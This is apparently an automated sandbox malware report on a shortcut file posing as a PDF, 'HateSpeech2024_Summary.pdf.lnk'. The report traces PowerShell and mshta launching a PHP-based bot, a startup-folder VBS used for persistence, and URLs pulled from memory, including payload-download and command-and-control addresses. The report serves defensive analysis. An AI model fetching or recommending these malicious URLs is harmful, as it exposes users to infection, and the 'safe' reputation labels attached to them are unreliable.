AcroCEF.exe 106 48->56         started        signatures18 process19 process20 58 tar.exe 52->58         started        62 conhost.exe 52->62         started        64 php.exe 54->64         started        66 conhost.exe 54->66         started        68 AcroCEF.exe 56->68         started        file21 74 C:\Users\user\AppData\Roaming\...\php.exe, PE32+ 58->74 dropped 76 C:\Users\user\AppData\...\vcruntime140.dll, PE32+ 58->76 dropped 78 C:\Users\user\AppData\Roaming\...\phpdbg.exe, PE32+ 58->78 dropped 82 63 other files (none is malicious) 58->82 dropped 110 Found PHP interpreter 58->110 80 C:\Users\user\AppData\Roaming\...\PHP-8.2.vbs, ASCII 64->80 dropped 112 Drops VBS files to the startup folder 64->112 signatures22

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        HateSpeech2024_Summary.pdf.lnk.bin.lnk24%ReversingLabsShortcut.Trojan.Pantera
        HateSpeech2024_Summary.pdf.lnk.bin.lnk27%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\deplister.exe0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_bz2.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_com_dotnet.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_curl.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dba.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dl_test.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_enchant.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_exif.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ffi.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_fileinfo.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ftp.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gd.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gettext.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gmp.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_imap.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_intl.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ldap.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mbstring.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mysqli.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_oci8_19.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_odbc.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_opcache.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_openssl.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_firebird.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_mysql.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_oci.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_odbc.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_pgsql.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_sqlite.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pgsql.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_shmop.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_snmp.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_soap.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sockets.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sodium.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sqlite3.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sysvshm.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_tidy.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_xsl.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zend_test.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zip.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\extras\ssl\legacy.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\glib-2.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\gmodule-2.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icudt71.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuin71.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuio71.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuuc71.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\lib\enchant\libenchant2_hunspell.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libcrypto-3-x64.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libenchant2.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libpq.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsasl.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsodium.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsqlite3.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssh2.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssl-3-x64.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\nghttp2.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-cgi.exe0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.exe0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8apache2_4.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8phpdbg.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8ts.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\phpdbg.exe0%ReversingLabs
        C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\vcruntime140.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-C0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_Social_Media_Report.pd0%Avira URL Cloudsafe
        https://myfilebuilders.com/Profes0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downlo0%Avira URL Cloudsafe
        https://myfilebuilders.com/Profess0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammLMEM0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_So0%Avira URL Cloudsafe
        https://myfilebuilders.com/Pro0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_d0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_Soc0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloa0%Avira URL Cloudsafe
        http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammMMC:0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammes0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_Social_Media_R0%Avira URL Cloudsafe
        https://myfilebuilders.com/samm(0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_down0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.e0%Avira URL Cloudsafe
        https://myfilebuilders.com/samm...X50%Avira URL Cloudsafe
        https://myfilebuilders.com/samm00%Avira URL Cloudsafe
        https://myfilebuilders.com/samm/0%Avira URL Cloudsafe
        http://www.zend.com/0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_do0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.ex0%Avira URL Cloudsafe
        http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30bE0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-0%Avira URL Cloudsafe
        https://myfilebuilders.com/samm70%Avira URL Cloudsafe
        https://myfilebuilders.com/sammkCg0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERA0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammF0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammB0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-B0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVER0%Avira URL Cloudsafe
        http://rodgersluciecassy.com/mbp/apit.php0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammls0%Avira URL Cloudsafe
        https://myfilebuilders.com/samm;0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.exe0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAG0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammH0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammI0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammG0%Avira URL Cloudsafe
        http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30%Avira URL Cloudsafe
        https://myfilebuilders.com/sammL0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_Soci0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammR0%Avira URL Cloudsafe
        https://myfilebuilders.com0%Avira URL Cloudsafe
        https://myfilebuilders.com/P0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_Social_Media_0%Avira URL Cloudsafe
        https://myfilebuilders.com/samm-00%Avira URL Cloudsafe
        https://myfilebuilders.com/sammP0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_dow0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_download0%Avira URL Cloudsafe
        https://www.php.netD0%Avira URL Cloudsafe
        http://bugs.php.net/report.php0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloade0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BO0%Avira URL Cloudsafe
        https://myfilebuilders.com/Profession0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot0%Avira URL Cloudsafe
        https://myfilebuilders.com/samma0%Avira URL Cloudsafe
        https://myfilebuilders.com/samm;.WSF;.WSH;.MS0%Avira URL Cloudsafe
        http://rodgersluciecassy.com/mbp0%Avira URL Cloudsafe
        https://myfilebuilders.c0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammj0%Avira URL Cloudsafe
        http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30r0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_Social_Media_Report.pdf0%Avira URL Cloudsafe
        https://myfilebuilders.co0%Avira URL Cloudsafe
        http://rodgersluciecassy.com/mbp/down/0%Avira URL Cloudsafe
        https://myfilebuilders.com/sammo0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional0%Avira URL Cloudsafe
        https://myfilebuilders.com/samm$global:?0%Avira URL Cloudsafe
        http://myfilebuilders.com0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professional_Social_Medi0%Avira URL Cloudsafe
        https://myfilebuilders.com/samm~0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE0%Avira URL Cloudsafe
        https://myfilebuilders.com/Professi0%Avira URL Cloudsafe
        https://myfilebuilders.com/php_bot_downloader_v2-0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://myfilebuilders.com/php_bot_downloader_powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://myfilebuilders.com/Professional_Social_Media_Report.pdpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://myfilebuilders.com/Professpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-Cpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://myfilebuilders.com/Profespowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://myfilebuilders.com/sammLMEMmshta.exe, 00000005.00000003.1846315954.000001EB13BD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1847163890.000001EB13BD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1855774349.000001EB13BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1848132792.000001EB13BEB000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://github.com/php/php-src/issues/(tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpfalse
          		high
          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.1665256909.000001B97E543000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://myfilebuilders.com/php_bot_downlopowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://myfilebuilders.com/php_bot_dpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://myfilebuilders.com/Propowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://myfilebuilders.com/Professional_Sopowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTDphp.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://myfilebuilders.com/php_bot_downloapowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://myfilebuilders.com/Professional_Socpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://myfilebuilders.com/sammMMC:mshta.exe, 00000005.00000003.1843743882.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885688982.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1884092790.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1889989783.000001EB0EFAD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLNpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000006.00000003.1665256909.000001B97E512000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://myfilebuilders.com/sammesmshta.exe, 00000005.00000002.1888633604.000001E30CCBF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://myfilebuilders.com/php_bot_downloaderpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://myfilebuilders.com/Professional_Social_Media_Rpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://myfilebuilders.com/samm(mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://myfilebuilders.com/php_bot_downpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.epowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.php.net/php.exefalse
                  		high
                  https://myfilebuilders.com/samm...X5mshta.exe, 00000005.00000003.1885898533.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841817928.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883693311.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890206556.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1848758754.000001EB0F024000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://myfilebuilders.com/samm0mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zend.com/php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://myfilebuilders.com/samm/mshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1654335033.000002A9CD591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://myfilebuilders.com/php_bot_dopowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://myfilebuilders.com/Professional_powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.expowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30bEphp.exe, 0000001C.00000002.2892874564.0000014E5D456000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://myfilebuilders.com/samm7mshta.exe, 00000005.00000002.1888475276.000001E30CCA4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://myfilebuilders.com/sammkCgmshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://myfilebuilders.com/samm;powershell.exe, 00000004.00000002.1653965522.000002A9CB6D0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://myfilebuilders.com/sammBmshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://myfilebuilders.com/php_bot_downloader_v2-AVERApowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://myfilebuilders.com/sammFmshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-Bpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://go.micropowershell.exe, 00000007.00000002.1757475272.000001F40C769000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://myfilebuilders.com/php_bot_downloader_v2-AVERpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myfilebuilders.com/sammlsmshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://rodgersluciecassy.com/mbp/apit.phpphp.exe, 00000018.00000002.2893070291.000001E12DC00000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D400000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myfilebuilders.com/php_bot_downloader_v2-AVERAGpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.exepowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myfilebuilders.com/sammImshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myfilebuilders.com/sammHmshta.exe, 00000005.00000002.1889045951.000001E30E5E0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z3php.exe, 00000018.00000002.2893070291.000001E12DC57000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D456000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
